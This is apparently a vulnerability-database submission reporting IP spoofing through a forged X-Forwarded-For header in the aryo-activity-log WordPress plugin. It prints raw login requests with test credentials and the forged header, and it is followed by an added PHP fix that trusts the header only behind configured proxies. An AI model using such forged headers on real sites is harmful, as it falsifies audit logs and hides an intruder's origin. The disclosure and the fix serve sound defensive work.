Submit #50744: HTTP Header Injection in aryo-activity-log

Title: HTTP Header Injection in aryo-activity-log
Description: HTTP header injection vulnerability in the aryo-activity-log WordPress plugin: the request IP recorded in the activity log can be manipulated by adding an X-Forwarded-For header.

1. Install the aryo-activity-log WordPress plugin: https://wordpress.org/plugins/aryo-activity-log/

2. Create a login request like the following:

    POST /wp-login.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://localhost/wp-login.php?loggedout=true&wp_lang=en_US
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 103
    Origin: http://localhost
    Connection: close
    Cookie: njt-fs-filemanager-settings-tab_last_tab=1; wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=d75f7938aa9b661bd79ac1844d216f59; wp_lang=en_US; ucp_tabs=2; _ga=GA1.1.1550157811.1667294040
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1

    log=admin&pwd=adminadmin&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwp-admin%2F&testcookie=1

3. Add X-Forwarded-For for IP spoofing in the activity log:

    POST /wp-login.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://localhost/wp-login.php?loggedout=true&wp_lang=en_US
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 103
    Origin: http://localhost
    X-Forwarded-For: 1.1.1.1
    Connection: close
    Cookie: njt-fs-filemanager-settings-tab_last_tab=1; wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=d75f7938aa9b661bd79ac1844d216f59; wp_lang=en_US; ucp_tabs=2; _ga=GA1.1.1550157811.1667294040
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1

    log=admin&pwd=adminadmin&wp-submit=Log+In&redirect_to=http%3A%2F%2Flocalhost%2Fwp-admin%2F&testcookie=1

4. Navigate to the activity log.

POC:
https://drive.google.com/file/d/1x-pgK3_-uS7NWfkEt_tk4Wc9FhXk-pYX/view?usp=sharing
https://drive.google.com/file/d/1YNOLomPC95rRvtk0topUhStVIa7Y8lcq/view?usp=sharing
User: rezaduty (ID 10530)
Submission: 03/11/2022 11:46 (2 years ago)
Moderation: 11/11/2022 08:06 (8 days later)
Status: Accepted
VulDB Entry: 213448
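The root cause described in the submission is that the logged client address is taken from a client-controlled header. The following is an added example, not the aryo-activity-log plugin's own code, showing how a plugin could derive the address to log while honouring X-Forwarded-For only when the direct TCP peer (REMOTE_ADDR) is a proxy the site operator has explicitly configured as trusted. The function name, the trusted-proxy list and the sample request environments are assumptions constructed for this example.

```php
<?php
// Added example (not the plugin's code): pick the client IP to record in an
// activity log without trusting a forged X-Forwarded-For header.
// $trustedProxies is an operator-supplied allow-list (assumed here).

function client_ip_for_log(array $server, array $trustedProxies = []): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';

    // The peer address must itself be a valid IP; otherwise record a placeholder.
    if (filter_var($remote, FILTER_VALIDATE_IP) === false) {
        return '0.0.0.0';
    }

    // Not behind a trusted proxy: the TCP peer *is* the client, so any
    // X-Forwarded-For the client attached is ignored entirely.
    if (!in_array($remote, $trustedProxies, true)) {
        return $remote;
    }

    $xff = $server['HTTP_X_FORWARDED_FOR'] ?? '';
    if ($xff === '') {
        return $remote;
    }

    // X-Forwarded-For is "client, proxy1, proxy2, ...": each proxy appends the
    // address it saw. Walk from the right, skipping trusted proxies; the first
    // hop that is not a trusted proxy is the address the trusted edge observed.
    $hops = array_map('trim', explode(',', $xff));
    for ($i = count($hops) - 1; $i >= 0; $i--) {
        $hop = $hops[$i];
        if (filter_var($hop, FILTER_VALIDATE_IP) === false) {
            return $remote; // malformed header: fall back to the peer address
        }
        if (!in_array($hop, $trustedProxies, true)) {
            return $hop;
        }
    }
    // Every hop was a trusted proxy; nothing better than the peer is known.
    return $remote;
}

// Constructed request environments (not captured from a real site).
$trusted = ['10.0.0.2']; // assumed address of the site's reverse proxy

// A direct client forging the header, as in the submission's step 3:
// the log must record the real peer, not 1.1.1.1.
$directSpoof = [
    'REMOTE_ADDR'          => '203.0.113.10',
    'HTTP_X_FORWARDED_FOR' => '1.1.1.1',
];

// A client behind the trusted proxy that also forged the header; the proxy
// appended the address it actually saw, so the right-to-left walk recovers it.
$viaProxy = [
    'REMOTE_ADDR'          => '10.0.0.2',
    'HTTP_X_FORWARDED_FOR' => '1.1.1.1, 198.51.100.7',
];

echo 'direct spoof  -> ', client_ip_for_log($directSpoof, $trusted), PHP_EOL; // 203.0.113.10
echo 'via proxy     -> ', client_ip_for_log($viaProxy, $trusted), PHP_EOL;    // 198.51.100.7
echo 'no proxy list -> ', client_ip_for_log($viaProxy, []), PHP_EOL;          // 10.0.0.2
```

The important property is the first early return: when no trusted proxy list is configured, X-Forwarded-For is never consulted, so the forged value in the submission's request cannot reach the log. Only a deployment that actually terminates connections at a known proxy opts in, and even then the header is read from the trusted end rather than taking the client-supplied first element at face value.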
